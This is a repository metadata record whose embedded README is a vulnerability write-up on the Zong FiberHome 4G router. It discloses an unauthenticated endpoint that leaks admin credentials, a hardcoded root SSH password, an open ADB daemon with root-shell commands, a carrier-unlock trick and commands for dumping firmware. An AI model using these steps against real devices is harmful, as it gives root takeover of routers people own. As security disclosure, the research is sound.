{"id":18939909,"url":"https://github.com/abdullah2993/zong-wifi","last_synced_at":"2025-06-20T13:34:08.353Z","repository":{"id":83983991,"uuid":"140077041","full_name":"abdullah2993/zong-wifi","owner":"abdullah2993","description":null,"archived":false,"fork":false,"pushed_at":"2019-11-08T19:15:42.000Z","size":1056,"stargazers_count":7,"open_issues_count":4,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-25T09:40:37.221Z","etag":null,"topics":["exploit","hack","unlock","unlocker","vulnerability","zong"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/abdullah2993.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-07-07T11:05:40.000Z","updated_at":"2023-02-05T04:26:11.000Z","dependencies_parsed_at":null,"dependency_job_id":"c0d4d2ce-3d2e-48a4-a601-608e479f0ca7","html_url":"https://github.com/abdullah2993/zong-wifi","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/abdullah2993/zong-wifi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/abdullah2993","download_url":"https://codeload.github.com/abdullah2993/zong-wifi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260953383,"owners_count":23088030,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","hack","unlock","unlocker","vulnerability","zong"],"created_at":"2024-11-08T12:19:22.926Z","updated_at":"2025-06-20T13:34:03.343Z","avatar_url":"https://github.com/abdullah2993.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# Zong FiberHome 4G Device\n\n ## Vulnerabilities and Exploits\n Although the device use a wierd authentication method, it is nothing more than a gimmick used \n by the UI code to give an illusion of authentication.\n All the endpoints are accessible directly without authentication and the best part of it all is you can\n use the [`admin`](http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=admin) endpoint to get the username and password for the router.\n\nThe output of the `admin` endpoint is something like\n```\n\u003c?xml version=\"1.0\" encoding=\"US-ASCII\"?\u003e\n\u003cRGW\u003e\n\t\u003cmanagement\u003e\n\t\t\u003crouter_username\u003eadmin\u003c/router_username\u003e\n\t\t\u003crouter_password\u003eadmin\u003c/router_password\u003e\n\t\t\u003cweb_wlan_enable/\u003e\n\t\t\u003chttpd_port/\u003e\n\t\t\u003csyslogd_enable/\u003e\n\t\t\u003cweb_wan_enable/\u003e\n\t\t\u003csyslogd_rem_ip/\u003e\n\t\t\u003cturbo_mode/\u003e\n        \u003ccustomer/\u003e\n\t\u003c/management\u003e\n\u003c/RGW\u003e\n```\n\nThe vulerability explained above is [well know and quite old](https://github.com/OsamaMahmood/Zong-router-exploit) but wait, There's more! to my knowledge(not sure though) the `Fiber Home` version of the `Zong` devices are unlocked by default but if yours is not, you can use a simple trick to get super user access and unlock\nthe device direcltly from the `Admin Panel` all you have to do is login to your router and change the default **username** from `admin` to `root` and voila you can see a new tab named `Advance` in `Settings` which provides options to unlock the device, As shown below\n\n![Advance Settings](/zong_adv_settings.PNG?raw=true \"Advance Settings\")\n\n## Analysis\nIt gets more interesting once you do a portscan of the device. The portscan shows the following ports to be open\n - 22 - SSH\n - 53 - DNS\n - 80 - HTTP (Admin Panel)\n - 3020 - Unknown\n - 3021 - Unknown\n - 5555 - ADB\n\n### Port 22\nYou can ssh into the device as `root` using password `oelinux123`\n\n### Port 53 and 80\nThese ports are standard `DNS` and `HTTP` ports\n\n#### Endpoints\n\nBase URL: `/xml_action.cgi?method=get\u0026module=duster\u0026file=[name]`\nknown file names are:\n - admin\n - app_fun_support_list\n - battery_charge\n - custom_fw\n - detailed_log\n - dns\n - download_local_upgrade\n - lan\n - lock_cell_clear\n - message\n - message_drafts\n - message_outbox\n - message_set\n - message_state\n - message_state\n - net_advace_set\n - ntp_server\n - pin_puk\n - reset\n - restore_defaults\n - shutdown\n - status1\n - time_setting\n - traffic_excess_set\n - uapxb_wlan_basic_settings\n - uapxb_wlan_security_settings\n - upgrade_info\n - ussd_business\n - wan\n - wan_choose_net\n - wan_ip\n - wlan_auto_setting\n\n### Port 3020\nPort 3020 is interesting once you connect to it it immediatly send the banner `ms_version:1` and then appears to send/receive nothing but if you keep connected it starts sending packets with `JSON` payloads \"periodically\" which appears to be 4-byte length prefixed, see the sample payloads below\n\n```\n{\n\t\"operate\": \"report\",\n\t\"service_name\": \"modem\",\n\t\"signal_strength\": 2\n}\n```\n```\n{\n\t\"operate\": \"report\",\n\t\"service_name\": \"modem\",\n\t\"signal_strength_v1\": [\n\t\t{\n\t\t\t\"cdma_dbm\": 0,\n\t\t\t\"evdo_dbm\": -125,\n\t\t\t\"gsm_signal_strength\": 0,\n\t\t\t\"lte_rsrp\": -112,\n\t\t\t\"operator_type\": 2,\n\t\t\t\"tds_signal_strength\": 0,\n\t\t\t\"wcdma_signal_strength\": 0\n\t\t}\n\t]\n}\n```\n\n### Port 3021\nThis port lets you connect to it and keeps the connection open as long as you don't send anything but as soon as you send something it immediately disconnects, possibly expects somekind of pattern IMO(these kinds of ports were found on other routers too)\n\n### Port 5555\nThis port runs an unauthenticated `adb daemon` so you can easily connect to it using `adb` and get shell access as follow\n```\nadb connect 192.168.8.1:5555\nadb shell\n```\nyou will get access as root user so you can pretty much do anything you want.\n\n### Dumping Image\nYou can list the flash partitions using:\n```\ncat /proc/mtd\n\nOutput:\n\ndev:    size   erasesize  name\nmtd0: 00140000 00020000 \"sbl\"\nmtd1: 00140000 00020000 \"mibib\"\nmtd2: 00b00000 00020000 \"efs2\"\nmtd3: 00360000 00020000 \"sdi\"\nmtd4: 00360000 00020000 \"tz\"\nmtd5: 000c0000 00020000 \"mba\"\nmtd6: 00360000 00020000 \"rpm\"\nmtd7: 031e0000 00020000 \"qdsp\"\nmtd8: 000e0000 00020000 \"appsbl\"\nmtd9: 00800000 00020000 \"apps\"\nmtd10: 00040000 00020000 \"scrub\"\nmtd11: 04a80000 00020000 \"cache\"\nmtd12: 00160000 00020000 \"misc\"\nmtd13: 00560000 00020000 \"cdrom\"\nmtd14: 002e0000 00020000 \"logo\"\nmtd15: 00800000 00020000 \"recovery\"\nmtd16: 00100000 00020000 \"fota\"\nmtd17: 01080000 00020000 \"recoveryfs\"\nmtd18: 01080000 00020000 \"system\"\nmtd19: 12e80000 00020000 \"userdata\"\n```\nyou can just `cat` the device and pipe the data to a file e.g. `ssh root@192.168.8.1 \"cat /dev/mtd18\" \u003e system.img` to get the system image\n\n### Filesystem\nIts just a linux filesystem, fun stuff can be found in `/usr/mifi/`. Some of the configurations are also stored in `sqlite 3` databases and can be found in `/usr/data/`\n\n## Credits\nThanks to [IMExperts](https://github.com/IMExperts) for providing the `ssh` password as well as mentioning that port `5555` is running `adb`\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fabdullah2993%2Fzong-wifi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fabdullah2993%2Fzong-wifi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fabdullah2993%2Fzong-wifi/lists"}